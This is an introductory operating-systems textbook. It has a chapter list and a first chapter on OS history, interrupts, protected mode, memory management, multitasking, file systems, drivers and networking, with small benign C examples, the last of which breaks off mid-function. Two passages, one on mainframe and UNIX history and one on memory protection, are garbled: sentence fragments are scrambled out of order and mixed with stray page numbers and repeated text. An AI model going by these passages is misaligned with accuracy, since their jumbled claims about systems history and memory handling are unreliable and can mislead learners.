Chapter 1: Introduction to Operating System
• What Is Operating System?
• History of Operating System
• Features
• Examples of Operating Systems

Chapter 2: Operating System Structure
• System Components
• Operating Systems Services
• System Calls and System Programs
• Layered Approach Design
• Mechanisms and Policies

Chapter 3: Process
• Definition of Process
• Process State
• Process Operations
• Process Control Block
• Process (computing)
• Sub-processes and multi-threading
• Representation
• Process management in multi-tasking operating systems
• Processes in Action
• Some Scheduling Disciplines


Chapter 4: Threads
• Threads
• Thread Creation, Manipulation and Synchronization
• User Level Threads and Kernel Level Threads
• Context Switch

Chapter 5: The Central Processing Unit (CPU)
• The Architecture of Mic-1
• Simple Model of a Computer - Part 3
• The Fetch-Decode-Execute Cycle
• Instruction Set
• Microprogram Control versus Hardware Control
• CISC versus RISC
• CPU Scheduling
• CPU/Process Scheduling
• Scheduling Algorithms

Chapter 6: Inter-process Communication
• Critical Section
• Mutual Exclusion
• Proposals for Achieving Mutual Exclusion
• Semaphores

Chapter 7: Deadlock
• Definition
• Deadlock Condition
• Dealing with Deadlock Problem


Chapter 8: Memory Management
• About Memory
• Heap Management
• Using Memory

Chapter 9: Caching and Intro to File Systems
• Introduction to File Systems
• File System Implementation
• An old Homework problem
• File Systems
• Files on disk or CD-ROM
• Memory Mapping Files

Chapter 10: Directories and Security
• Security
• Protection Mechanisms
• Directories
• Hierarchical Directories
• Directory Operations
• Naming Systems
• Security and the File System
• Design Principles
• A Sampling of Protection Mechanisms

Chapter 11: File System Implementation
• The User Interface to Files
• The User Interface to Directories
• Implementing File Systems
• Node
• Software Levels
• Multiplexing and Arm Scheduling

Chapter 12: Networking
• Network
• Basic Concepts
• Other Global Issues


CHAPTER 1: INTRODUCTION TO OPERATING SYSTEM

What is Operating System?

An operating system (commonly abbreviated to either OS or O/S) is an interface between hardware and user; it is responsible for the management and coordination of activities and the sharing of the limited resources of the computer. The operating system acts as a host for applications that are run on the machine. As a host, one of the purposes of an operating system is to handle the details of the operation of the hardware. This relieves application programs from having to manage these details and makes it easier to write applications.

Almost all computers, including handheld computers, desktop computers, supercomputers, and even video game consoles, use an operating system of some type. Some of the oldest models may, however, use an embedded operating system that may be contained on a compact disk or other data storage device.

Operating systems offer a number of services to application programs and users. Applications access these services through application programming interfaces (APIs) or system calls. By invoking these interfaces, the application can request a service from the operating system, pass parameters, and receive the results of the operation. Users may also interact with the operating system through some kind of software user interface (UI), either by typing commands using a command line interface (CLI) or by using a graphical user interface (GUI, commonly pronounced "gooey"). For hand-held and desktop computers, the user interface is generally considered part of the operating system. On large multiuser systems like Unix and Unix-like systems, the user interface is generally implemented as an application program that runs outside the operating system. (Whether the user interface should be included as part of the operating system is a point of contention.)

Common contemporary operating systems include Mac OS, Windows, Linux, BSD and Solaris. While servers generally run on Unix or Unix-like systems, embedded device markets are split amongst several operating systems.
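To make the relationship between applications, APIs, and system calls concrete, here is a minimal C sketch: the program requests a service through the standard POSIX write() interface, passing parameters (a file descriptor, a buffer, and a length) and receiving the result of the operation back from the kernel.

```c
/* Minimal sketch: an application requesting an OS service through the
 * POSIX API. The write() wrapper traps into the kernel via a system
 * call; the process passes parameters and receives the result
 * (the number of bytes written, or -1 on error). */
#include <unistd.h>   /* write() */
#include <string.h>   /* strlen() */

int main(void)
{
    const char *msg = "Hello from user space\n";

    /* File descriptor 1 is standard output; the kernel decides which
     * device or file it actually refers to. */
    ssize_t written = write(1, msg, strlen(msg));

    return (written < 0) ? 1 : 0;
}
```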

An operating system can also be described as the most important program that runs on a computer. Every general-purpose computer must have an operating system to run other programs. Operating systems perform basic tasks, such as recognizing input from the keyboard, sending output to the display screen, keeping track of files and directories on the disk, and controlling peripheral devices such as disk drives and printers. For large systems, the operating system has even greater responsibilities and powers. It is like a traffic cop: it makes sure that different programs and users running at the same time do not interfere with each other. The operating system is also responsible for security, ensuring that unauthorized users do not access the system.

Operating systems can be classified as follows:

• Multi-user: Allows two or more users to run programs at the same time. Some operating systems permit hundreds or even thousands of concurrent users.
• Multiprocessing: Supports running a program on more than one CPU.
• Multitasking: Allows more than one program to run concurrently.
• Multithreading: Allows different parts of a single program to run concurrently.
• Real time: Responds to input instantly. General-purpose operating systems, such as DOS and UNIX, are not real-time.

Operating systems provide a software platform on top of which other programs, called application programs, can run. The application programs must be written to run on top of a particular operating system. Your choice of operating system therefore determines to a great extent the applications you can run. For PCs, the most popular operating systems are DOS, OS/2, and Windows, but others, such as Linux, are also available.

As a user, you normally interact with the operating system through a set of commands. For example, the DOS operating system contains commands such as COPY and RENAME for copying files and changing the names of files. The commands are accepted and executed by a part of the operating system called the command processor or command line interpreter. Graphical user interfaces allow you to enter commands by pointing and clicking at objects that appear on the screen.

History of Operating System

The history of computer operating systems recapitulates to a degree the recent history of computer hardware. Operating systems (OSes) provide a set of functions needed and used by most application programs on a computer, and the necessary linkages for the control and synchronization of the computer's hardware. On the first computers, without an operating system, every program needed the full hardware specification to run correctly and perform standard tasks, and its own drivers for peripheral devices like printers and card-readers. The growing complexity of hardware and application programs eventually made operating systems a necessity.

Background

Early computers lacked any form of operating system. The user had sole use of the machine and would arrive armed with program and data, often on punched paper and tape. The program would be loaded into the machine, and the machine would be set to work until the program completed or crashed. Programs could generally be debugged via a front panel using switches and lights. It is said that Alan Turing was a master of this on the early Manchester Mark 1 machine, and he was already deriving the primitive conception of an operating system from the principles of the Universal Turing machine.

Later machines came with libraries of support code, which would be linked to the user's program to assist in operations such as input and output. This was the genesis of the modern-day operating system. However, machines still ran a single job at a time. At Cambridge University in England the job queue was at one time a washing line from which tapes were hung with different colored clothes-pegs to indicate job-priority.

As machines became more powerful, the time to run programs diminished and the time to hand off the equipment became very large by comparison. Accounting for and paying for machine usage moved on from checking the wall clock to automatic logging by the computer. Run queues evolved from a literal queue of people at the door, to a heap of media on a jobs-waiting table, or batches of punch-cards stacked one on top of the other in the reader, until the machine itself was able to select and sequence which magnetic tape drives were online. Where program developers had originally had access to run their own jobs on the machine, they were supplanted by dedicated machine operators who looked after the well-being and maintenance of the machine and were less and less concerned with implementing tasks manually. When commercially available computer centers were faced with the implications of data lost through tampering or operational errors, equipment vendors were put under pressure to enhance the runtime libraries to prevent misuse of system resources. Automated monitoring was needed not just for CPU usage but for counting pages printed, cards punched, cards read, and disk storage used, and for signaling when operator intervention was required by jobs such as changing magnetic tapes.

All these features were building up towards the repertoire of a fully capable operating system. Eventually the runtime libraries became an amalgamated program that was started before the first customer job and could read in the customer job, control its execution, record its usage, clean up after it, and immediately go on to process the next job. Significantly, it became possible for programmers to use symbolic program code instead of having to hand-encode binary images, once task-switching allowed a computer to perform translation of a program into binary form before running it. These resident background programs, capable of managing multistep processes, were often called monitors or monitor-programs before the term OS established itself.

An underlying program offering basic hardware management, software scheduling and resource monitoring may seem a remote ancestor to the user-oriented OSes of the personal computing era. But there has been a shift in meaning. With the era of commercial computing, more and more "secondary" software was bundled in the OS package, leading eventually to the perception of an OS as a complete user-system with utilities, applications (such as text editors and file managers) and configuration tools, and having an integrated graphical user interface. The true descendant of the early operating systems is what is now called the "kernel". In technical and development circles the old restricted sense of an OS persists, because of the continued active development of embedded operating systems for all kinds of devices with a data-processing component, from hand-held gadgets up to industrial robots and real-time control systems, which do not run user applications at the front-end. An embedded OS in a device today is not so far removed as one might think from its ancestor of the 1950s.

The mainframe era

It is generally thought that the first operating system used for real work was GM-NAA I/O, produced in 1956 by General Motors' Research division for its IBM 704. Most other early operating systems for IBM mainframes were also produced by customers.

Early operating systems were very diverse, with each vendor or customer producing one or more operating systems specific to their particular mainframe computer. Every operating system, even from the same vendor, could have radically different models of commands, operating procedures, and such facilities as debugging aids. Typically, each time the manufacturer brought out a new machine, there would be a new operating system, and most applications would have to be manually adjusted, recompiled, and retested.

Systems on IBM hardware: The state of affairs continued until the 1960s, when IBM, already a leading hardware vendor, stopped the work on existing systems and put all the effort into developing the System/360 series of machines, all of which used the same instruction architecture. IBM intended to develop a single operating system for the new hardware as well, the OS/360. The problems encountered in the development of the OS/360 are legendary, and are described by Fred Brooks in The Mythical Man-Month, a book that has become a classic of software engineering. Because of performance differences across the hardware range and delays with software development, a whole family of operating systems were introduced instead of a single OS/360.

IBM wound up releasing a series of stop-gaps followed by three longer-lived operating systems:

• OS/MFT for mid-range systems. This had one successor, OS/VS1, which was discontinued in the 1980s.
• OS/MVT for large systems. This was similar in most ways to OS/MFT (programs could be ported between the two without being re-compiled), but has more sophisticated memory management and a time-sharing facility, TSO. MVT had several successors including the current z/OS.
• DOS/360 for small System/360 models, which had several successors including the current z/VSE. It was significantly different from OS/MFT and OS/MVT.

IBM maintained full compatibility with the past, so that programs developed in the sixties can still run under z/VSE (if developed for DOS/360) or z/OS (if developed for OS/MFT or OS/MVT) with no change.

Other mainframe operating systems: Control Data Corporation developed the SCOPE operating system in the 1960s, for batch processing. In cooperation with the University of Minnesota, the KRONOS and later the NOS operating systems were developed during the 1970s, which supported simultaneous batch and timesharing use. Like many commercial timesharing systems, its interface was an extension of the DTSS time sharing system, one of the pioneering efforts in timesharing and programming languages. In the late 1970s, Control Data and the University of Illinois developed the PLATO system, which used plasma panel displays and long-distance time sharing networks. PLATO was remarkably innovative for its time; the shared memory model of PLATO's TUTOR programming language allowed applications such as real-time chat and multi-user graphical games.

innovative for its time. including TOPS-10 and TOPS-20 time sharing systems for the 36-bit PDP-10 class systems. produced a series of EXEC operating systems. By widespread use it exemplified the idea of an operating system that was conceptually the same across various hardware platforms. developed Multics and General Electric Comprehensive Operating Supervisor (GECOS). the first commercial computer manufacturer. when that language was ported to a new machine architecture UNIX was also able to be ported. and easily modified. Another system which evolved in this time frame was the Pick operating system. which introduced the concept of ringed security privilege levels. Early systems had utilized microprogramming to implement features on their systems in order to permit different underlying architecture to appear to be the same as others in a series. it was renamed to General Comprehensive Operating System (GCOS). TOPS-10 was a particularly popular system in universities. The case of 8-bit home computers and game consoles 9 . the shared memory model of PLATO's TUTOR programming language allowed applications such as real-time chat and multi-user graphical games. It still was owned by AT&T and that limited its use to groups or corporations who could afford to license it. it achieved wide acceptance. several hardware capabilities evolved that allowed similar or ported software to run on more than one system. such as being the first commercial implementation of virtual memory. and in the early ARPANET community. Prior to the widespread use of UNIX. easily obtainable. card readers and line printers. a dialect of ALGOL). In the 1970s. this was a batch-oriented system that managed magnetic drums. Other than that Digital Equipment Corporation created the simple RT-11 system for its 16-bit PDP-11 class machines. Like all early main-frame systems. disks. Burroughs Corporation introduced the B5000 in 1961 with the MCP (Master Control Program) operating system. Minicomputers and the rise of UNIX The beginnings of the UNIX operating system was developed at AT&T Bell Laboratories in the late 1960s. also patterned after the Dartmouth BASIC system. The system is an example of a system which started as a database application support program and graduated to system work. The Pick system was developed and sold by Microdata Corporation who created the precursors of the system. UNIVAC produced the Real-Time Basic (RTB) system to support large-scale time sharing. UNIVAC. Project MAC at MIT. and the VMS system for the 32-bit VAX computer. Since it was written in a high level C language. This portability permitted it to become the choice for a second generation of minicomputers and the first generation of workstations. MCP is still in use today in the Unisys ClearPath/MCP line of computers. In fact most 360's after the 360/40 (except the 360/165 and 360/168) were microprogrammed implementations. After Honeywell acquired GE's computer business. Digital Equipment Corporation developed many operating systems for its various computer lines. It also became a requirement within the Bell systems operating companies. In the late 1960s through the late 1970s. It became one of the roots of the open source movement. But soon other means of achieving application compatibility were proven to be more significant. working with GE. Because it was essentially free in early editions. MCP also introduced many other ground-breaking innovations. 
The B5000 was a stack machine designed to exclusively support high-level languages with no machine language or assembler and indeed the MCP was the first OS to be written exclusively in a high-level language (ESPOL.

Home computers: Although most small 8-bit home computers of the 1980s, such as the Commodore 64, the Atari 8-bit, the Amstrad CPC, the ZX Spectrum series and others could use a disk-loading operating system, such as CP/M or GEOS, they could generally work without one. In fact, most if not all of these computers shipped with a built-in BASIC interpreter on ROM, which also served as a crude operating system, allowing minimal file management operations (such as deletion, copying, etc.) to be performed and sometimes disk formatting, along of course with application loading and execution, which sometimes required a non-trivial command sequence, as with the Commodore 64.

The fact that the majority of these machines were bought for entertainment and educational purposes and were seldom used for more "serious" or business/science oriented applications partly explains why a "true" operating system was not necessary. Another reason is that they were usually single-task and single-user machines and shipped with minimal amounts of RAM, usually between 4 and 256 kilobytes, with 64 and 128 being common figures, and 8-bit processors, so an operating system's overhead would likely compromise the performance of the machine without really being necessary. Even the available word processor and integrated software applications were mostly self-contained programs which took over the machine completely, as also did video games.

Game consoles and video games: Since virtually all video game consoles and arcade cabinets designed and built after 1980 were true digital machines (unlike the analog Pong clones and derivatives), some of them carried a minimal form of BIOS or built-in game, such as the ColecoVision, the Sega Master System and the SNK Neo Geo. There were however successful designs where a BIOS was not necessary, such as the Nintendo NES and its clones.

Modern day game consoles and videogames, starting with the PC-Engine, all have a minimal BIOS that also provides some interactive utilities such as memory card management, Audio or Video CD playback, and copy protection, and that sometimes carries libraries for developers to use, etc. Few of these cases, however, would qualify as a "true" operating system. The most notable exceptions are probably the Dreamcast game console, which includes a minimal BIOS, like the PlayStation, but can load the Windows CE operating system from the game disk, allowing easy porting of games from the PC world, and the Xbox game console, which is little more than a disguised Intel-based PC running a secret, modified version of Microsoft Windows in the background. Furthermore, there are Linux versions that will run on a Dreamcast and later game consoles as well.

Long before that, Sony had released a kind of development kit called the Net Yaroze for its first PlayStation platform, which provided a series of programming and developing tools to be used with a normal PC and a specially modified "Black PlayStation" that could be interfaced with a PC and download programs from it. These operations require in general a functional OS on both platforms involved.

In general, it can be said that videogame consoles and arcade coin-operated machines used at most a built-in BIOS during the 1970s, 1980s and most of the 1990s, while from the PlayStation era and beyond they started getting more and more sophisticated, to the point of requiring a generic or custom-built OS for aiding in development and expandability.

The personal computer era: Apple, PC/MS/DR-DOS and beyond

The development of microprocessors made inexpensive computing available for the small business and hobbyist, which in turn led to the widespread use of interchangeable hardware components using a common interconnection (such as the S-100, SS-50, Apple II, ISA, and PCI buses), and an increasing need for 'standard' operating systems to control them.

The most important of the early OSes on these machines was Digital Research's CP/M-80 for the 8080 / 8085 / Z-80 CPUs. It was based on several Digital Equipment Corporation operating systems, mostly for the PDP-11 architecture. Microsoft's first operating system, M-DOS, was designed along many of the PDP-11 features, but for microprocessor-based systems. MS-DOS (or PC-DOS when supplied by IBM) was based originally on CP/M-80. Each of these machines had a small boot program in ROM which loaded the OS itself from disk. The BIOS on the IBM-PC class machines was an extension of this idea, and has accreted more features and functions in the 20 years since the first IBM-PC was introduced in 1981.

The decreasing cost of display equipment and processors made it practical to provide graphical user interfaces for many operating systems, such as the generic X Window System that is provided with many UNIX systems, or other graphical systems such as Microsoft Windows, the RadioShack Color Computer's OS-9 Level II/MultiVue, Commodore's AmigaOS, Apple's Mac OS, or even IBM's OS/2. The original GUI was developed at Xerox Palo Alto Research Center in the early '70s (the Alto computer system) and imitated by many vendors.

The rise of virtualization

Operating systems originally ran directly on the hardware itself and provided services to applications. With VM/CMS on System/370, IBM introduced the notion of the virtual machine, where the operating system itself runs under the control of a hypervisor, instead of being in direct control of the hardware. VMware popularized this technology on personal computers. Over time, the line between virtual machine monitors and operating systems was blurred:

• Hypervisors grew more complex, gaining their own application programming interface, memory management or file system.
• Virtualization becomes a key feature of operating systems, as exemplified by Hyper-V in Windows Server 2008 or HP Integrity Virtual Machines in HP-UX.
• In some systems, such as POWER5 and POWER6-based servers from IBM, the hypervisor is no longer optional.
• Applications have been re-designed to run directly on a virtual machine monitor.
• In many ways, virtual machine software today plays the role formerly held by the operating system, including managing the hardware resources (processor, memory, I/O devices), applying scheduling policies, and allowing system administrators to manage the system.

Features

Program execution: The operating system acts as an interface between an application and the hardware; the user interacts with the hardware from "the other side". The operating system is a set of services which simplifies development of applications. Executing a program involves the creation of a process by the operating system. The kernel creates a process by assigning memory and other resources, establishing a priority for the process (in multi-tasking systems), loading program code into memory, and executing the program. The program then interacts with the user and/or other devices, performing its intended function.
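The following minimal C sketch illustrates this sequence on a POSIX system (the program run, ls, is just an example): the kernel creates a new process, new program code is loaded into it, and the parent receives the result.

```c
/* Minimal sketch of program execution on a POSIX system: the parent
 * asks the kernel to create a new process (fork), the child replaces
 * its image with a new program (execvp), and the parent waits for
 * the result. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>     /* fork, execvp */
#include <sys/wait.h>   /* waitpid */

int main(void)
{
    pid_t pid = fork();          /* kernel duplicates the calling process */

    if (pid < 0) {
        perror("fork");
        return EXIT_FAILURE;
    }
    if (pid == 0) {
        /* Child: load new program code into this process and run it. */
        char *argv[] = { "ls", "-l", NULL };
        execvp("ls", argv);
        perror("execvp");        /* only reached if exec fails */
        _exit(EXIT_FAILURE);
    }

    int status;
    waitpid(pid, &status, 0);    /* parent collects the child's exit status */
    printf("child exited with status %d\n", WEXITSTATUS(status));
    return EXIT_SUCCESS;
}
```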

Interrupts: Interrupts are central to operating systems, as they provide an efficient way for the operating system to interact with and react to its environment. The alternative, having the operating system "watch" the various sources of input for events that require action (polling), is not a good use of CPU resources. Interrupt-based programming is directly supported by most CPUs. Interrupts provide a computer with a way of automatically running specific code in response to events. Even very basic computers support hardware interrupts, and allow the programmer to specify code which may be run when that event takes place.

When an interrupt is received, the computer's hardware automatically suspends whatever program is currently running, saves its status, and runs computer code previously associated with the interrupt. This is analogous to placing a bookmark in a book when someone is interrupted by a phone call and then taking the call. In modern operating systems, interrupts are handled by the operating system's kernel. Interrupts may come from either the computer's hardware or from the running program.

When a hardware device triggers an interrupt, the operating system's kernel decides how to deal with this event, generally by running some processing code. How much code gets run depends on the priority of the interrupt (for example, a person usually responds to a smoke detector alarm before answering the phone). The processing of hardware interrupts is a task that is usually delegated to software called device drivers, which may be part of the operating system's kernel, part of another program, or both. Device drivers may then relay information to a running program by various means.

A program may also trigger an interrupt to the operating system. If a program wishes to access hardware, for example, it may interrupt the operating system's kernel, which causes control to be passed back to the kernel. The kernel will then process the request. If a program wishes additional resources (or wishes to shed resources) such as memory, it will trigger an interrupt to get the kernel's attention.

Protected mode and supervisor mode: Modern CPUs support something called dual mode operation. CPUs with this capability offer two modes, protected mode and supervisor mode, which allow certain CPU functions to be controlled and affected only by the operating system kernel. Here, protected mode does not refer specifically to the protected mode of the 80286 (Intel's x86 16-bit microprocessor), although the two are very similar; the term is used more generally in operating system theory to refer to all modes which limit the capabilities of programs running in that mode, providing things like virtual memory addressing and limiting access to hardware in a manner determined by a program running in supervisor mode. Similar modes have existed in supercomputers, minicomputers, and mainframes, as they are essential to fully supporting UNIX-like multi-user operating systems.

When a computer first starts up, it is automatically running in supervisor mode. The first few programs to run on the computer, being the BIOS, the bootloader and the operating system, have unlimited access to hardware, and this is required because, by definition, initializing a protected environment can only be done outside of one. However, when the operating system passes control to another program, it can place the CPU into protected mode.

In protected mode, programs may have access to a more limited set of the CPU's instructions. A user program may leave protected mode only by triggering an interrupt, causing control to be passed back to the kernel. In this way the operating system can maintain exclusive control over things like access to hardware and memory. CPUs might have other modes similar to 80286 protected mode as well, such as the virtual 8086 mode of the 80386 (Intel's x86 32-bit microprocessor, or i386).
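Hardware interrupt handling happens inside the kernel, but POSIX signals give a user-space analogy of the same idea; the sketch below is an illustration of the concept, not of how kernels are implemented. The process registers a handler, and when the event arrives (here, SIGINT from Ctrl-C) control is transferred to it asynchronously, much as a hardware interrupt suspends the running program.

```c
/* User-space analogy to interrupt handling, using POSIX signals: we
 * register code to run on an event, then sleep until it occurs. */
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

static volatile sig_atomic_t got_signal = 0;

static void handler(int signum)
{
    (void)signum;
    got_signal = 1;   /* just record the event; keep handlers minimal */
}

int main(void)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = handler;
    sigaction(SIGINT, &sa, NULL);   /* associate code with the event */

    while (!got_signal)
        pause();                    /* suspend until any signal arrives */

    printf("interrupt received, cleaning up\n");
    return 0;
}
```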

Windows 3. Attempts to alter these resources generally causes a switch to supervisor mode. Cooperative memory management. certain protected mode registers specify to the CPU what memory address it should allow a running program to access. If a program fails it may cause memory used by one or more other programs to be affected or overwritten. which contain information that the running program isn't allowed to alter. allowing the operating system to use the same memory locations for multiple tasks. placing the kernel in charge. Windows systems use a swap file instead of a partition. but programs could easily circumvent the need to use it. and do not exceed their allocated memory. including memory segmentation and paging. All methods require some level of hardware support (such as the 80286 MMU) which doesn't exist in all computers.) Under UNIX this kind of interrupt is referred to as a page fault. With cooperative memory management it takes only one misbehaved program to crash the system. This part is known as swap space. each program must have independent access to memory. the kernel will generally resort to terminating the offending program. used by many early operating systems assumes that all programs make voluntary use of the kernel's memory manager. Various methods of memory protection exist. and will report the error.The term "protected mode resource" generally refers to one or more CPU registers. by killing the program). In most Linux systems. and since it is both difficult to assign a meaningful result to such an operation. This ensures that a program does not interfere with memory already used by another program.1-Me had some level of memory protection. since programs often contain bugs which can cause them to exceed their allocated memory. Attempts to access other addresses will trigger an interrupt which will cause the CPU to re-enter supervisor mode. giving them almost unlimited control over the computer. part of the hard disk is reserved for virtual memory when the Operating system is being installed on the system. Virtual memory: The use of virtual memory addressing (such as paging or segmentation) means that the kernel can choose what memory each program may use at any given time. If a program tries to access memory that isn't in its current range of accessible memory. 13 . Malicious programs. This system of memory management is almost never seen anymore. however the system would often crash anyway. or viruses may purposefully alter another program's memory or may affect the operation of the operating system itself. (See section on memory management. but nonetheless has been allocated to it. Memory management: Among other things. Since programs time share. and because it is usually a sign of a misbehaving program. a multiprogramming operating system kernel must be responsible for managing all system memory which is currently in use by programs. In both segmentation and paging. A general protection fault would be produced indicating a segmentation violation had occurred. the kernel will be interrupted in the same way as it would if the program were to exceed its allocated memory. Memory protection enables the kernel to limit a process' access to the computer's memory. This is called a segmentation violation or Seg-V for short. Under Windows 9x all MS-DOS applications ran in supervisor mode. where the operating system can deal with the illegal operation the program was attempting (for example.

When the kernel detects a page fault, it will generally adjust the virtual memory range of the program which triggered it, granting it access to the memory requested. This gives the kernel discretionary power over where a particular application's memory is stored, or even whether or not it has actually been allocated yet.

In modern operating systems, application memory which is accessed less frequently can be temporarily stored on disk or other media to make that space available for use by other programs. This is called swapping, as an area of memory can be used by multiple programs, and what that memory area contains can be swapped or exchanged on demand. In most Linux systems, part of the hard disk is reserved for virtual memory when the operating system is installed; this part is known as swap space. Windows systems use a swap file instead of a partition.

Multitasking: Multitasking refers to the running of multiple independent computer programs on the same computer, giving the appearance that it is performing the tasks at the same time. Since most computers can do at most one or two things at one time, this is generally done via time sharing, which means that each program uses a share of the computer's time to execute.

An operating system kernel contains a piece of software called a scheduler, which determines how much time each program will spend executing, and in which order execution control should be passed to programs. Control is passed to a process by the kernel, which allows the program access to the CPU and memory. At a later time, control is returned to the kernel through some mechanism, so that another program may be allowed to use the CPU. This so-called passing of control between the kernel and applications is called a context switch.

An early model which governed the allocation of time to programs was called cooperative multitasking. In this model, when control is passed to a program by the kernel, it may execute for as long as it wants before explicitly returning control to the kernel. This means that a malicious or malfunctioning program may not only prevent any other programs from using the CPU, but it can hang the entire system if it enters an infinite loop. On many single-user operating systems cooperative multitasking is perfectly adequate, as home computers generally run a small number of well tested programs.

The philosophy governing preemptive multitasking is that of ensuring that all programs are given regular time on the CPU. This implies that all programs must be limited in how much time they are allowed to spend on the CPU without being interrupted. To accomplish this, modern operating system kernels make use of a timed interrupt: a protected mode timer is set by the kernel which triggers a return to supervisor mode after the specified time has elapsed. (See the sections on Interrupts and Dual Mode Operation above.) Windows NT was the first version of Microsoft Windows which enforced preemptive multitasking, but it didn't reach the home user market until Windows XP (since Windows NT was targeted at professionals).

Kernel Preemption: In recent years, concerns have arisen because of the long latencies often associated with some kernel run-times, sometimes on the order of 100 ms or more in systems with monolithic kernels. These latencies often produce noticeable slowness in desktop systems, and can prevent operating systems from performing time-sensitive operations such as audio recording and some communications.

Under Windows prior to Windows Vista, and Linux prior to version 2.6, all driver execution was co-operative, meaning that if a driver entered an infinite loop it would freeze the system. Modern operating systems extend the concepts of application preemption to device drivers and kernel code, so that the operating system has preemptive control over internal run-times as well. Under Windows Vista, the introduction of the Windows Display Driver Model (WDDM) accomplishes this for display drivers, and in Linux, the preemptable kernel model introduced in version 2.6 allows all device drivers and some other parts of kernel code to take advantage of preemptive multi-tasking.
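The distinction can be sketched from user space. In the illustrative C program below, the loop relies on the kernel's timed interrupt to keep other programs running even though it never gives up the CPU itself, while sched_yield() shows the cooperative counterpart of voluntarily returning control to the scheduler.

```c
/* Sketch contrasting cooperative and preemptive multitasking on POSIX:
 * even without the yield call, a preemptive kernel forces a context
 * switch when our time slice ends; sched_yield() is the cooperative
 * way of handing the CPU back early. */
#include <sched.h>
#include <stdio.h>

int main(void)
{
    for (long i = 0; i < 5; i++) {
        printf("doing a slice of work (%ld)\n", i);

        /* Cooperative behavior: politely let the scheduler run
         * another ready program before we continue. */
        sched_yield();
    }
    return 0;
}
```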

Disk access and file systems: Access to files stored on disks is a central feature of all operating systems. Computers store data on disks using files, which are structured in specific ways in order to allow for faster access, higher reliability, and better use of the drive's available space. The specific way in which files are stored on a disk is called a file system; it enables files to have names and attributes, and allows them to be stored in a hierarchy of directories or folders arranged in a directory tree.

Early operating systems generally supported a single type of disk drive and only one kind of file system. Early file systems were limited in their capacity, speed, and in the kinds of file names and directory structures they could use. These limitations often reflected limitations in the operating systems they were designed for, making it very difficult for an operating system to support more than one file system.

While many simpler operating systems support a limited range of options for accessing storage systems, operating systems like UNIX and Linux support a technology known as a virtual file system, or VFS. An operating system like UNIX allows a wide array of storage devices, regardless of their design or file systems, to be accessed through a common application programming interface (API). This makes it unnecessary for programs to have any knowledge about the device they are accessing. A VFS allows the operating system to provide programs with access to an unlimited number of devices, with an infinite variety of file systems installed on them, through the use of specific device drivers and file system drivers.

A connected storage device, such as a hard drive, is accessed through a device driver. The device driver understands the specific language of the drive and is able to translate that language into a standard language used by the operating system to access all disk drives. On UNIX, this is the language of block devices.

When the kernel has an appropriate device driver in place, it can then access the contents of the disk drive in raw format, which may contain one or more file systems. A file system driver is used to translate the commands used to access each specific file system into a standard set of commands that the operating system can use to talk to all file systems. Programs can then deal with these file systems on the basis of filenames and directories/folders, contained within a hierarchical structure. They can create, delete, open, and close files, as well as gather various information about them, including access permissions, size, free space, and creation and modification dates.

Various differences between file systems make supporting all file systems difficult. Allowed characters in file names, case sensitivity, and the presence of various kinds of file attributes make the implementation of a single interface for every file system a daunting task. Operating systems tend to recommend the use of (and so support natively) file systems specifically designed for them; for example, NTFS in Windows, and ext3 and ReiserFS in Linux. However, in practice, third-party drivers are usually available to give support for the most widely used file systems in most general-purpose operating systems (for example, NTFS is available in Linux through NTFS-3g, and ext2/3 and ReiserFS are available in Windows through FS-driver and rfstool).

Device drivers: A device driver is a specific type of computer software developed to allow interaction with hardware devices. Typically this constitutes an interface for communicating with the device, through the specific computer bus or communications subsystem that the hardware is connected to, providing commands to and/or receiving data from the device, and, on the other end, the requisite interfaces to the operating system and software applications. It is a specialized hardware-dependent computer program, also operating system specific, that enables another program (typically an operating system, an applications software package, or a computer program running under the operating system kernel) to interact transparently with a hardware device, and it usually provides the requisite interrupt handling necessary for asynchronous time-dependent hardware interfacing needs.

The key design goal of device drivers is abstraction. Every model of hardware (even within the same class of device) is different. Newer models are also released by manufacturers that provide more reliable or better performance, and these newer models are often controlled differently. Computers and their operating systems cannot be expected to know how to control every device, both now and in the future. To solve this problem, OSes essentially dictate how every type of device should be controlled. The function of the device driver is then to translate these OS-mandated function calls into device-specific calls. In theory, a new device, which is controlled in a new manner, should function correctly if a suitable driver is available. This new driver will ensure that the device appears to operate as usual from the operating system's point of view.
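The practical payoff of the VFS design is that a single API reaches every mounted file system. In the minimal sketch below, /etc/hostname is only an example path; the same open/read/close calls would work whether the file lived on ext3, NTFS, or a network share, because the kernel routes each call to the appropriate file system driver.

```c
/* Sketch of the uniform file API exposed through the VFS layer: the
 * program needs no knowledge of the device or file system behind
 * the path it opens. */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    char buf[256];
    int fd = open("/etc/hostname", O_RDONLY);  /* example path */
    if (fd < 0) {
        perror("open");
        return 1;
    }

    ssize_t n = read(fd, buf, sizeof(buf) - 1);
    if (n > 0) {
        buf[n] = '\0';
        printf("read %zd bytes: %s", n, buf);
    }

    close(fd);
    return 0;
}
```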

Networking: Currently most operating systems support a variety of networking protocols, hardware, and applications for using them. This means that computers running dissimilar operating systems can participate in a common network for sharing resources such as computing, files, printers, and scanners, using either wired or wireless connections. Networks can essentially allow a computer's operating system to access the resources of a remote computer to support the same functions as it could if those resources were connected directly to the local computer. This includes everything from simple communication, to using networked file systems, or even sharing another computer's graphics or sound hardware. Some network services allow the resources of a computer to be accessed transparently, such as SSH, which allows networked users direct access to a computer's command line interface.

Client/server networking involves a program on one computer connecting via a network to another computer, called a server. Servers, usually running UNIX or Linux, offer (or host) various services to other network computers and users. These services are usually provided through ports, or numbered access points, beyond the server's network address. Each port number is usually associated with a maximum of one running program, which is responsible for handling requests to that port. A daemon, being a user program, can in turn access the local hardware resources of that computer by passing requests to the operating system kernel.

Many operating systems support one or more vendor-specific or open networking protocols as well; for example, SNA on IBM systems, DECnet on systems from Digital Equipment Corporation, and Microsoft-specific protocols (SMB) on Windows. Specific protocols for specific tasks may also be supported, such as NFS for file access. Protocols like ESound (esd) can be easily extended over the network to provide sound from local applications on a remote system's sound hardware.
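A minimal C sketch of the client side, using the standard POSIX sockets API; example.com and port 80 are placeholders for any reachable server and service.

```c
/* Minimal sketch of client/server networking: open a TCP connection
 * to a server's numbered port, where one program (a daemon) is
 * responsible for handling requests. */
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void)
{
    struct addrinfo hints, *res;
    memset(&hints, 0, sizeof(hints));
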